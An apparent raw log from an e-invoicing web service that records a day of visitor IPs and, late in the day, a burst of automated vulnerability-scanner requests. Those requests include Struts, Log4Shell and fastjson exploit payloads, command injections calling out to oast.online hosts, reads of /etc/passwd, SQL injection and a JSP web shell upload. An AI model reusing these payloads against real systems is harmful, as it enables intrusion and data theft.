2022-07-12 00:06:58.6172|INFO|EINVOICENET.WebService.ClsLog|114.119.129.71
2022-07-12 00:51:29.1647|INFO|EINVOICENET.WebService.ClsLog|37.177.6.194
2022-07-12 01:00:45.1514|INFO|EINVOICENET.WebService.ClsLog|114.119.129.71
2022-07-12 01:03:23.9255|INFO|EINVOICENET.WebService.ClsLog|114.119.129.71
2022-07-12 01:03:36.3342|INFO|EINVOICENET.WebService.ClsLog|209.141.44.61
2022-07-12 01:05:08.8313|INFO|EINVOICENET.WebService.ClsLog|193.124.7.9
2022-07-12 01:35:11.5373|INFO|EINVOICENET.WebService.ClsLog|start
2022-07-12 01:35:11.5393|INFO|EINVOICENET.WebService.ClsLog|productKey= 0101300842;0314645129;0308478060;0312863386;0310510427;0304503975
2022-07-12 01:35:11.5493|INFO|EINVOICENET.WebService.ClsLog|encrypt= 0101300842;0314645129;0308478060;0312863386;0310510427;0304503975
2022-07-12 01:35:11.5634|INFO|EINVOICENET.WebService.ClsLog|45.61.186.139
2022-07-12 01:50:27.6412|INFO|EINVOICENET.WebService.ClsLog|125.132.145.143
2022-07-12 01:51:30.2622|INFO|EINVOICENET.WebService.ClsLog|37.0.8.116 username=admin&psd=Feefifofum
2022-07-12 01:53:24.7865|INFO|EINVOICENET.WebService.ClsLog|209.141.46.123
2022-07-12 02:01:27.9059|INFO|EINVOICENET.WebService.ClsLog|158.69.252.227
2022-07-12 02:20:11.5528|INFO|EINVOICENET.WebService.ClsLog|54.36.148.127
2022-07-12 03:05:11.7280|INFO|EINVOICENET.WebService.ClsLog|start
2022-07-12 03:05:11.7310|INFO|EINVOICENET.WebService.ClsLog|productKey= 0101300842;0314645129;0308478060;0312863386;0310510427;0304503975
2022-07-12 03:05:11.7410|INFO|EINVOICENET.WebService.ClsLog|encrypt= 0101300842;0314645129;0308478060;0312863386;0310510427;0304503975
2022-07-12 03:05:11.7510|INFO|EINVOICENET.WebService.ClsLog|27.115.124.101
2022-07-12 03:20:39.7741|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 03:25:51.4477|INFO|EINVOICENET.WebService.ClsLog|34.210.17.1
2022-07-12 03:26:23.4677|INFO|EINVOICENET.WebService.ClsLog|34.212.219.107
2022-07-12 03:26:25.9836|INFO|EINVOICENET.WebService.ClsLog|157.55.39.8
2022-07-12 03:32:43.3631|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 04:07:11.1613|INFO|EINVOICENET.WebService.ClsLog|start
2022-07-12 04:07:11.1644|INFO|EINVOICENET.WebService.ClsLog|productKey= 0101300842;0314645129;0308478060;0312863386;0310510427;0304503975
2022-07-12 04:07:11.1744|INFO|EINVOICENET.WebService.ClsLog|encrypt= 0101300842;0314645129;0308478060;0312863386;0310510427;0304503975
2022-07-12 04:07:11.1844|INFO|EINVOICENET.WebService.ClsLog|200.58.95.200
2022-07-12 04:17:43.7610|INFO|EINVOICENET.WebService.ClsLog|74.201.28.29 username=admin&psd=Feefifofum
2022-07-12 04:21:14.5486|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 04:23:47.6663|INFO|EINVOICENET.WebService.ClsLog|185.196.220.70
2022-07-12 04:30:02.0570|INFO|EINVOICENET.WebService.ClsLog|157.55.39.8
2022-07-12 04:46:33.9798|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 05:05:18.1803|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 05:22:20.2631|INFO|EINVOICENET.WebService.ClsLog|135.19.177.78
2022-07-12 06:03:12.1738|INFO|EINVOICENET.WebService.ClsLog|start
2022-07-12 06:03:12.1768|INFO|EINVOICENET.WebService.ClsLog|productKey= 0101300842;0314645129;0308478060;0312863386;0310510427;0304503975
2022-07-12 06:03:12.1869|INFO|EINVOICENET.WebService.ClsLog|encrypt= 0101300842;0314645129;0308478060;0312863386;0310510427;0304503975
2022-07-12 06:03:12.1999|INFO|EINVOICENET.WebService.ClsLog|27.124.32.169
2022-07-12 06:25:33.3135|INFO|EINVOICENET.WebService.ClsLog|54.36.148.39
2022-07-12 06:35:59.7260|INFO|EINVOICENET.WebService.ClsLog|34.138.31.75
2022-07-12 06:38:49.8593|INFO|EINVOICENET.WebService.ClsLog|114.119.129.71
2022-07-12 06:58:08.5246|INFO|EINVOICENET.WebService.ClsLog|222.80.76.212
2022-07-12 06:58:09.7951|INFO|EINVOICENET.WebService.ClsLog|222.80.76.212
2022-07-12 07:04:53.5974|INFO|EINVOICENET.WebService.ClsLog|54.36.148.71
2022-07-12 07:05:32.6606|INFO|EINVOICENET.WebService.ClsLog|45.90.161.148 username=admin&psd=Feefifofum
2022-07-12 07:06:51.0759|INFO|EINVOICENET.WebService.ClsLog|185.7.214.104
2022-07-12 07:13:34.3309|INFO|EINVOICENET.WebService.ClsLog|34.138.31.75
2022-07-12 07:21:30.2469|INFO|EINVOICENET.WebService.ClsLog|37.0.8.116 username=admin&psd=Feefifofum
2022-07-12 07:21:42.0681|INFO|EINVOICENET.WebService.ClsLog|163.172.201.154
2022-07-12 07:39:57.8450|INFO|EINVOICENET.WebService.ClsLog|31.220.1.83
2022-07-12 07:40:18.4531|INFO|EINVOICENET.WebService.ClsLog|177.185.156.252
2022-07-12 07:46:33.3481|INFO|EINVOICENET.WebService.ClsLog|54.36.148.170
2022-07-12 07:46:35.4970|INFO|EINVOICENET.WebService.ClsLog|111.43.116.13
2022-07-12 07:59:11.9336|INFO|EINVOICENET.WebService.ClsLog|114.119.129.71
2022-07-12 08:04:52.7911|INFO|EINVOICENET.WebService.ClsLog|34.75.10.46
2022-07-12 08:07:50.4269|INFO|EINVOICENET.WebService.ClsLog|34.75.10.46
2022-07-12 08:13:19.2678|INFO|EINVOICENET.WebService.ClsLog|34.75.10.46
2022-07-12 08:16:09.1624|INFO|EINVOICENET.WebService.ClsLog|185.180.143.137
2022-07-12 08:17:32.9903|INFO|EINVOICENET.WebService.ClsLog|34.75.10.46
2022-07-12 08:19:32.4089|INFO|EINVOICENET.WebService.ClsLog|185.7.214.104
2022-07-12 08:38:02.5435|INFO|EINVOICENET.WebService.ClsLog|54.36.148.194
2022-07-12 08:54:12.9642|INFO|EINVOICENET.WebService.ClsLog|34.75.10.46
2022-07-12 08:55:26.0222|INFO|EINVOICENET.WebService.ClsLog|34.75.10.46
2022-07-12 09:13:00.9905|INFO|EINVOICENET.WebService.ClsLog|114.119.129.71
2022-07-12 09:15:22.2872|INFO|EINVOICENET.WebService.ClsLog|34.75.10.46
2022-07-12 09:18:59.7167|INFO|EINVOICENET.WebService.ClsLog|192.241.205.227
2022-07-12 09:20:27.8924|INFO|EINVOICENET.WebService.ClsLog|185.180.143.75
2022-07-12 09:24:10.4962|INFO|EINVOICENET.WebService.ClsLog|110.136.217.40
2022-07-12 09:24:53.7348|INFO|EINVOICENET.WebService.ClsLog|34.75.10.46
2022-07-12 09:37:44.1202|INFO|EINVOICENET.WebService.ClsLog|185.7.214.104
2022-07-12 09:41:27.1416|INFO|EINVOICENET.WebService.ClsLog|34.75.10.46
2022-07-12 09:41:45.8907|INFO|EINVOICENET.WebService.ClsLog|185.196.220.70
2022-07-12 09:57:13.2818|INFO|EINVOICENET.WebService.ClsLog|58.255.134.27 foobar192.168.0.100TCP12341234
���������������������������������������������������������������������������������������������������������
2022-07-12 10:01:52.5662|INFO|EINVOICENET.WebService.ClsLog|104.196.165.78
2022-07-12 10:05:18.9710|INFO|EINVOICENET.WebService.ClsLog|104.196.165.78
2022-07-12 10:07:42.3638|INFO|EINVOICENET.WebService.ClsLog|45.61.186.139
2022-07-12 10:11:36.8925|INFO|EINVOICENET.WebService.ClsLog|104.196.165.78
2022-07-12 10:16:22.2140|INFO|EINVOICENET.WebService.ClsLog|104.196.165.78
2022-07-12 10:16:27.9969|INFO|EINVOICENET.WebService.ClsLog|114.119.129.71
2022-07-12 10:17:45.5692|INFO|EINVOICENET.WebService.ClsLog|51.159.164.227
2022-07-12 10:17:46.1337|INFO|EINVOICENET.WebService.ClsLog|51.159.164.227
2022-07-12 10:20:50.5045|INFO|EINVOICENET.WebService.ClsLog|144.217.135.174
2022-07-12 10:20:52.4448|INFO|EINVOICENET.WebService.ClsLog|144.217.135.174
2022-07-12 10:20:57.3632|INFO|EINVOICENET.WebService.ClsLog|144.217.135.174
2022-07-12 10:20:58.3669|INFO|EINVOICENET.WebService.ClsLog|144.217.135.174
2022-07-12 10:21:05.9818|INFO|EINVOICENET.WebService.ClsLog|144.217.135.174
2022-07-12 10:21:20.0962|INFO|EINVOICENET.WebService.ClsLog|144.217.135.174
2022-07-12 10:21:21.0959|INFO|EINVOICENET.WebService.ClsLog|144.217.135.174
2022-07-12 10:21:22.1077|INFO|EINVOICENET.WebService.ClsLog|144.217.135.174
2022-07-12 10:21:23.1034|INFO|EINVOICENET.WebService.ClsLog|144.217.135.174
2022-07-12 10:21:24.3668|INFO|EINVOICENET.WebService.ClsLog|144.217.135.174
2022-07-12 10:21:25.3796|INFO|EINVOICENET.WebService.ClsLog|144.217.135.174
2022-07-12 10:21:26.6551|INFO|EINVOICENET.WebService.ClsLog|144.217.135.174
2022-07-12 10:21:27.6619|INFO|EINVOICENET.WebService.ClsLog|144.217.135.174
2022-07-12 10:21:30.4957|INFO|EINVOICENET.WebService.ClsLog|144.217.135.174
2022-07-12 10:21:31.5826|INFO|EINVOICENET.WebService.ClsLog|144.217.135.174
2022-07-12 10:21:33.1810|INFO|EINVOICENET.WebService.ClsLog|144.217.135.174
2022-07-12 10:21:34.2048|INFO|EINVOICENET.WebService.ClsLog|144.217.135.174
2022-07-12 10:21:47.0669|INFO|EINVOICENET.WebService.ClsLog|149.56.150.217
2022-07-12 10:32:55.1012|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 10:35:59.0555|INFO|EINVOICENET.WebService.ClsLog|185.7.214.104
2022-07-12 10:50:42.2573|INFO|EINVOICENET.WebService.ClsLog|65.21.206.46
2022-07-12 10:59:43.6974|INFO|EINVOICENET.WebService.ClsLog|104.196.165.78
2022-07-12 11:01:07.5476|INFO|EINVOICENET.WebService.ClsLog|104.196.165.78
2022-07-12 11:19:46.0047|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 11:21:04.4027|INFO|EINVOICENET.WebService.ClsLog|104.217.249.182 username=admin&psd=Feefifofum
2022-07-12 11:24:26.2798|INFO|EINVOICENET.WebService.ClsLog|104.196.165.78
2022-07-12 11:30:58.5889|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 11:35:10.6696|INFO|EINVOICENET.WebService.ClsLog|104.196.165.78
2022-07-12 11:53:21.5001|INFO|EINVOICENET.WebService.ClsLog|178.73.215.171
2022-07-12 11:54:57.4439|INFO|EINVOICENET.WebService.ClsLog|104.196.165.78
2022-07-12 12:09:46.2534|INFO|EINVOICENET.WebService.ClsLog|185.7.214.104
2022-07-12 12:13:24.1497|INFO|EINVOICENET.WebService.ClsLog|128.14.141.34
2022-07-12 12:24:18.1749|INFO|EINVOICENET.WebService.ClsLog|207.46.13.126
2022-07-12 12:27:35.5213|INFO|EINVOICENET.WebService.ClsLog|114.119.129.71
2022-07-12 12:33:36.8715|INFO|EINVOICENET.WebService.ClsLog|104.196.165.78
2022-07-12 12:38:10.5586|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 12:39:08.3277|INFO|EINVOICENET.WebService.ClsLog|104.196.165.78
2022-07-12 12:51:01.4044|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 12:51:31.9456|INFO|EINVOICENET.WebService.ClsLog|104.196.165.78
2022-07-12 12:54:03.9272|INFO|EINVOICENET.WebService.ClsLog|185.7.214.104
2022-07-12 13:19:03.7680|INFO|EINVOICENET.WebService.ClsLog|46.249.32.140
2022-07-12 13:20:04.1894|INFO|EINVOICENET.WebService.ClsLog|114.119.129.71
2022-07-12 13:24:13.6847|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 13:29:52.0374|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 13:35:59.3590|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 13:46:06.5171|INFO|EINVOICENET.WebService.ClsLog|45.90.161.148 username=admin&psd=Feefifofum
2022-07-12 13:54:00.9232|INFO|EINVOICENET.WebService.ClsLog|185.7.214.104
2022-07-12 14:02:33.2521|INFO|EINVOICENET.WebService.ClsLog|114.119.129.71
2022-07-12 14:24:06.7077|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 14:33:40.6334|INFO|EINVOICENET.WebService.ClsLog|114.119.129.71
2022-07-12 14:33:45.8928|INFO|EINVOICENET.WebService.ClsLog|114.119.129.71
2022-07-12 14:43:33.4957|INFO|EINVOICENET.WebService.ClsLog|112.27.89.152
2022-07-12 14:44:35.2819|INFO|EINVOICENET.WebService.ClsLog|114.119.129.71
2022-07-12 15:21:24.6832|INFO|EINVOICENET.WebService.ClsLog|172.104.138.223
2022-07-12 15:48:11.1915|INFO|EINVOICENET.WebService.ClsLog|114.119.129.71
2022-07-12 15:54:47.9431|INFO|EINVOICENET.WebService.ClsLog|185.102.170.48
2022-07-12 16:02:12.1040|INFO|EINVOICENET.WebService.ClsLog|94.102.61.10
2022-07-12 16:20:39.3975|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 16:32:37.7320|INFO|EINVOICENET.WebService.ClsLog|192.241.208.195
2022-07-12 16:36:11.9277|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 16:46:35.5160|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 17:06:55.9126|INFO|EINVOICENET.WebService.ClsLog|151.246.214.68
2022-07-12 17:07:17.0214|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 17:12:29.6808|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 17:21:32.7636|INFO|EINVOICENET.WebService.ClsLog|157.90.181.206
2022-07-12 17:33:23.7811|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 17:35:16.5482|INFO|EINVOICENET.WebService.ClsLog|157.55.39.8
2022-07-12 17:45:24.9718|INFO|EINVOICENET.WebService.ClsLog|114.119.132.250
2022-07-12 18:07:21.9845|INFO|EINVOICENET.WebService.ClsLog|124.64.223.46 0x%5B%5D=androxgh0st
2022-07-12 18:13:49.0153|INFO|EINVOICENET.WebService.ClsLog|192.241.219.163
2022-07-12 18:24:05.5774|INFO|EINVOICENET.WebService.ClsLog|192.241.216.48
2022-07-12 18:37:46.6071|INFO|EINVOICENET.WebService.ClsLog|34.140.248.32
2022-07-12 18:38:21.8100|INFO|EINVOICENET.WebService.ClsLog|157.55.39.8
2022-07-12 18:39:33.4059|INFO|EINVOICENET.WebService.ClsLog|66.249.65.18
2022-07-12 19:37:24.3959|INFO|EINVOICENET.WebService.ClsLog|start
2022-07-12 19:37:24.3989|INFO|EINVOICENET.WebService.ClsLog|productKey= 0101300842;0314645129;0308478060;0312863386;0310510427;0304503975
2022-07-12 19:37:24.4089|INFO|EINVOICENET.WebService.ClsLog|encrypt= 0101300842;0314645129;0308478060;0312863386;0310510427;0304503975
2022-07-12 19:37:24.4220|INFO|EINVOICENET.WebService.ClsLog|65.49.20.67
2022-07-12 19:49:23.4695|INFO|EINVOICENET.WebService.ClsLog|154.89.5.213
2022-07-12 19:59:57.2675|INFO|EINVOICENET.WebService.ClsLog|54.36.148.247
2022-07-12 20:07:19.4230|INFO|EINVOICENET.WebService.ClsLog|188.208.61.48
2022-07-12 20:30:59.7153|INFO|EINVOICENET.WebService.ClsLog|start
2022-07-12 20:30:59.7183|INFO|EINVOICENET.WebService.ClsLog|productKey= 0101300842;0314645129;0308478060;0312863386;0310510427;0304503975
2022-07-12 20:30:59.7283|INFO|EINVOICENET.WebService.ClsLog|encrypt= 0101300842;0314645129;0308478060;0312863386;0310510427;0304503975
2022-07-12 20:30:59.7384|INFO|EINVOICENET.WebService.ClsLog|114.119.129.71
2022-07-12 20:57:29.2068|INFO|EINVOICENET.WebService.ClsLog|114.119.129.71
2022-07-12 21:06:02.2470|INFO|EINVOICENET.WebService.ClsLog|114.119.129.71
2022-07-12 21:10:54.8515|INFO|EINVOICENET.WebService.ClsLog|114.119.129.71
2022-07-12 21:14:11.5860|INFO|EINVOICENET.WebService.ClsLog|206.189.158.2
2022-07-12 21:18:16.6545|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
2022-07-12 21:18:22.4574|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 ------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"
%{
(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +
(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +
(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))
}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF—
2022-07-12 21:18:27.1612|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;"
2022-07-12 21:18:32.3614|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:18:33.0172|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:18:45.7949|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"username":"${jndi:ldap://${hostName}.cb6o5meg2jqcit8000109ayfa95wnjaa9.oast.online}","password":"admin"}
2022-07-12 21:20:05.5098|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:20:32.5212|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:20:37.1278|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:20:39.1613|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
= WUghPB3szB3Xwg66 the CREATEDATE
recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId = wV66
originalCreateDate = wUghPB3szB3Xwg66
FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
needReadFile = yRWZdAS6
originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("2BqZOVzRQ1yX4w0IBsB4XsaJxe3"))){out.println("" +excuteCmd(request.getParameter("2BqZOVzRQ1yX4w0IBsB4XsaJxe3")) + "");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
2022-07-12 21:20:40.4418|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:20:42.0502|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://cb6o5meg2jqcit800010aau66axky6yrs.oast.online #
2022-07-12 21:20:42.8243|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:20:45.4836|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://cb6o5meg2jqcit800010he6bd6ku8tsw7.oast.online #
2022-07-12 21:20:46.2146|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:24:01.6468|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:24:10.8920|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:24:28.8380|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 action=&token=`wget http://cb6o5meg2jqcit800010rygzjudqc4y1u.oast.online`&mode=`wget http://cb6o5meg2jqcit80001035jthtq4a3538.oast.online`
2022-07-12 21:24:49.8141|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:25:04.0469|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:26:21.6911|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fcb6o5meg2jqcit800010mw3heujm3yaid.oast.online%22%29%3Bprint%28crypt.crypt%28%22
2022-07-12 21:26:25.3100|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fcb6o5meg2jqcit800010rzpmh4b17nj8x.oast.online%22%29%3Bprint%28crypt.crypt%28%22
2022-07-12 21:30:33.1315|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:30:41.5774|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 token=1337&client=ssh&tgt=*&fun=a&roster=projectdiscovery&ssh_priv=nuclei
2022-07-12 21:32:13.2423|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:32:16.9223|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:32:22.1223|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 logtype=XML&timezone=1%3Bwget+http%3A%2F%2Fcb6o5meg2jqcit800010mmyfawuaitwgd.oast.online%3B
2022-07-12 21:32:22.9957|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"code":"test","state":"test"}
2022-07-12 21:33:11.5602|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 -----------------------------20873900192357278038549710136
Content-Disposition: form-data; name="file1"; filename="poc.aspx"
Content-Type: image/jpeg
2BqZOVJRZMVprTiMuJXwPW1atKs
-----------------------------20873900192357278038549710136--
2022-07-12 21:34:02.5884|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 ------WebKitFormBoundaryreButJNjkCniQExX
Content-Disposition: form-data; name="file"; filename="2BqZOa3jaR7Tg6HBPZQfIFB9tmu.jar"
Content-Type: application/octet-stream
PK��
�����?J'T������������ ���META-INF/PK��
�����?J'T?([7j���?�������META-INF/MANIFEST.MF?M??LK-.?
K-*???R0?3??r,J??,K-B��?V?�+?$x??J3sJt?*?�RRRx???R�KRS?�?�??�?
??e?y
?z�z?�?)?^)? �,?�?
???\�PK��
�����?J'Tb?)^�������
���Evil.class}T?Z?@�=?mJ��?"??Z�?�?R?�Q?- �$?#�?�??O??[?�?O/??Y|�?B�???$s???3??|?�`�y�?1?qCA�#
nb?#�?X�??n??6?��wqO?? �M?�T|?h?C}??�r�??�?�?q??�'q????F�[?F@?D0??P?;?Z0�?i?8?i?K?
D???mC?�6? u�-??x?h?'???6�??XO?+?�x???[??�??'??
�???B?gJ�?��?�??�??V?Py�Z0?V?9c??6??�u??�h?D?4?-=??z????i�??�??,ZI?9???4?z� b??j??XY????Db?W�? �?��r�?�
�?Hr\??q??�}�];??m??�??I�Xs�???/%L�V?�PK����
�����?J'T������������ �����������?A����META-INF/PK����
�����?J'T?([7j���?���������������??'���META-INF/MANIFEST.MFPK����
�����?J'Tb?)^�������
�����������???���Evil.classPK����
�����?J'T������������������������??I���META-INF/maven/PK����
�����?J'T������������������������??v���META-INF/maven/org.example/PK����
�����?J'T������������#�����������???���META-INF/maven/org.example/eviljar/PK����
�����?H'TR??L����;���*�����������???���META-INF/maven/org.example/eviljar/pom.xmlPK����
�����kI'TG??s���s���1�����������??N���META-INF/maven/org.example/eviljar/pom.propertiesPK����������?���������
------WebKitFormBoundaryreButJNjkCniQExX
Content-Disposition: form-data; name="request"; filename="blob"
Content-Type: application/json
null
------WebKitFormBoundaryreButJNjkCniQExX--
2022-07-12 21:34:06.5231|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"entry":"Evil","request":"id"}
2022-07-12 21:34:12.8312|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:34:16.4742|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:34:22.9688|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:34:26.2267|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJ7e3VzZXJuYW1lfX0ifX0=
2022-07-12 21:35:09.7858|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:36:38.5463|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:36:51.5336|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:38:02.6976|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:38:07.1778|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/2BqZOasvQbsapDAZegVdKhS1jyR.php&data=HACKERMAN
2022-07-12 21:40:05.2389|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:42:31.8418|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:42:39.7493|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl cb6o5meg2jqcit800010k68j7j9wggsio.oast.online;","data":"hi"}
2022-07-12 21:42:39.7633|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 target_addr="1.1.1.1+`wget+http%3A%2F%2Fcb6o5meg2jqcit80001061r9dmhcgko9q.oast.online%2F`"&waninf=127.0.0.1"
2022-07-12 21:43:31.5503|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
find_profile
name
*
2022-07-12 21:43:32.1298|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}}
2022-07-12 21:43:37.6158|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"}
2022-07-12 21:46:17.9528|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:46:44.9470|INFO|EINVOICENET.WebService.ClsLog|66.240.236.109
2022-07-12 21:46:46.3057|INFO|EINVOICENET.WebService.ClsLog|167.94.138.120
2022-07-12 21:46:46.7780|INFO|EINVOICENET.WebService.ClsLog|167.94.138.120
2022-07-12 21:46:57.3026|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:46:59.7262|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:47:42.9776|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:47:45.2057|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=
2022-07-12 21:47:52.1756|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 type='|cat /etc/passwd||'
2022-07-12 21:48:41.9916|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:48:59.3467|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:51:14.5370|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:52:41.9618|INFO|EINVOICENET.WebService.ClsLog|127.0.0.1 {"user":"access-admin","password":"password","type":"login"}
2022-07-12 21:52:54.9080|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:52:58.0837|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
2022-07-12 21:53:34.1239|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53 {
"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
"properties":{
"@type":"java.util.Properties",
"UserTransaction":"rmi://cb6o5meg2jqcit800010i1kbaaaf85cgy.oast.online/Exploit"
}
}
2022-07-12 21:53:37.3768|INFO|EINVOICENET.WebService.ClsLog|128.199.190.53
foo
2
<_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0"
